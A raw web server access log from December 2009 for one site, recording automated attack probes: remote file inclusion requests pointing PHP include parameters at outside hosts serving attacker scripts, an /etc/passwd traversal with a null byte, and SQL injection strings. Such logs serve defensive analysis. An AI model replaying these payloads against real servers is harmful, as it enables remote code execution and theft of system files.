119.202.76.160 - - [13/Dec/2009:13:15:06 -0800] "GET /logs/access_081121.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:15:06 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:17:00 -0800] "GET /logs/access_090806.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:17:00 -0800] "GET /home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:17:00 -0800] "GET /logs/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:17:11 -0800] "GET /logs/access_090506.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:17:23 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:17:24 -0800] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:18:06 -0800] "GET /galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:18:06 -0800] "GET /logs//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:18:06 -0800] "GET /logs/access_090623.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:18:07 -0800] "GET /logs/access_081121.log//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:19:53 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:19:54 -0800] "GET /logs/access_090924.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:19:54 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:19:55 -0800] "GET /logs/access_091103.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:19:58 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:19:58 -0800] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:29 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:29 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:29 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:29 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:32 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:32 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:32 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:20:32 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
206.168.219.110 - - [13/Dec/2009:13:21:01 -0800] "GET /logs/access_080410.log%3C/span%3E%3Cspanclass=77+and(select+count(*)+from+Pablin77)-- HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:28 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:28 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:28 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:31 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:32 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:32 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:32 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
206.168.219.110 - - [13/Dec/2009:13:21:34 -0800] "GET /logs/access_080319.log%3C/span%3E%3Cspanclass=77+and(select+count(*)+from+Pablin77)-- HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:21:40 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:22:13 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:22:13 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:22:13 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:22:17 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:22:51 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:22:51 -0800] "GET /logs/access_080518.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:22:51 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:03 -0800] "GET /logs/access_081013.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:10 -0800] "GET /logs/access_080518.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:10 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:10 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:10 -0800] "GET /logs/access_081013.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:23:12 -0800] "GET /logs/access_090924.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:23:26 -0800] "GET /logs/access_091103.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:35 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:35 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:35 -0800] "GET /logs/access_080518.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:36 -0800] "GET /logs/access_081013.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:39 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:39 -0800] "GET /logs/access_080518.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:40 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:13:23:54 -0800] "GET /logs/access_081013.log%20%20/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:24:33 -0800] "GET /logs/access_090216.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:24:33 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:24:33 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:24:33 -0800] "GET /logs/access_081023.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:25:35 -0800] "GET /logs/access_090216.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:13:25:35 -0800] "GET /logs/access_081023.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:26:05 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:26:05 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:26:05 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:26:06 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:27:03 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:27:03 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:27:03 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:27:03 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:27:16 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:27:16 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:27:16 -0800] "GET /logs/access_080515.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:17 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:17 -0800] "GET /logs/access_080222.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:27:17 -0800] "GET /logs/access_080521.log%20%20/includes/functions_admin.php?phpbb_root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:18 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 7173 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:23 -0800] "GET /logs/access_090711.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:37 -0800] "GET /logs/access_080222.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:37 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:39 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 7173 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:13:27:41 -0800] "GET /logs/access_090711.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.127.249.145 - - [13/Dec/2009:13:28:21 -0800] "GET /index.php?contenido=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14841 "-" "libwww-perl/5.803" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:33 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/access_091107.log%20%20/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/access_091107.log%20%20/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:33 -0800] "GET /index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/access_091107.log%20%20/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:33 -0800] "GET /logs/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:34 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:34 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:28:34 -0800] "GET /logs/access_091107.log%20%20/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:38 -0800] "GET /index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:38 -0800] "GET /logs/access_091107.log%20%20/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:38 -0800] "GET /index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:28:38 -0800] "GET /logs/index2.php?url_page=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:29:09 -0800] "GET /logs/access_080703.log%20%20/index.php?go=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:29:09 -0800] "GET /logs/index.php?go=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:29:09 -0800] "GET /index.php?go=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 200 14793 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [13/Dec/2009:13:29:12 -0800] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [13/Dec/2009:13:29:12 -0800] "GET /logs//modules/Forums/admin/admin_words.php?phpbb_root_path=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [13/Dec/2009:13:29:12 -0800] "GET /logs/access_090316.log%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:13 -0800] "GET /logs/access_080313.log/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:13 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:13 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:14 -0800] "GET /logs/access_080313.log/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:14 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:14 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [13/Dec/2009:13:29:17 -0800] "GET /logs/access_090311.log%20%20//modules/Forums/admin/admin_words.php?phpbb_root_path=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:25 -0800] "GET /logs/access_080313.log/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:25 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:25 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:27 -0800] "GET /logs/access_080313.log/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:27 -0800] "GET /logs/index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [13/Dec/2009:13:29:27 -0800] "GET /index2.php?url_page=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com" 125